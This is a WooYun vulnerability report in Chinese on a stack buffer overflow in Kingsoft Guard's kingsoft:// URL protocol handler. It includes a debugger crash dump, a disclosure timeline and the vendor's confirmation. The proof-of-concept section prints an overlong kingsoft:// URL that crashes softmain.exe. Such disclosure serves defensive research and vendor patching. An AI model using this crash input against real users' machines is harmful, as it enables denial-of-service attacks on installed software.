当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042447

漏洞标题:金山卫士一处栈溢出漏洞

相关厂商:金山软件集团

漏洞作者: 我是小号

提交时间:2013-11-10 10:17

修复时间:2014-02-08 10:17

公开时间:2014-02-08 10:17

漏洞类型:设计错误/逻辑缺陷

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-10: 细节已通知厂商并且等待厂商处理中
2013-11-11: 厂商已经确认,细节仅向厂商公开
2013-11-14: 细节向第三方安全合作伙伴开放
2014-01-05: 细节向核心白帽子及相关领域专家公开
2014-01-15: 细节向普通白帽子公开
2014-01-25: 细节向实习白帽子公开
2014-02-08: 细节向公众公开

简要描述:

金山卫士一处栈溢出漏洞(可以拒绝服务攻击)

详细说明:

金山卫士一处栈溢出漏洞

STATUS_STACK_BUFFER_OVERRUN encountered
(1c50.1f10): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for D:\program files (x86)\ksafe\softmain.exe -
eax=00000000 ebx=00581728 ecx=76b00174 edx=0018cb8d esi=00000000 edi=00000000
eip=76afff55 esp=0018cdd4 ebp=0018ce50 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
kernel32!GetProfileStringW+0x12a09:
76afff55 cc int 3


问题处在这里

kernel32!GetProfileStringW+0x12a09


这个函数出错了

漏洞证明:

浏览器地址栏内先输入:
kingsoft://02131516
然后输入:
kingsoft://02131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656021315165163056161065106560213151651630561610651065602131516516305616106510656vv021315165163056161065106560213151651630561610651065602131516516305616106510656vv02131516516305616106510656

01.png


修复方案:

说的比较清楚了,你们修改吧

版权声明:转载请注明来源 我是小号@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2013-11-11 11:43

厂商回复:

感谢提交,我们尽快联系研发人员修复

最新状态:

暂无


漏洞评价:

评论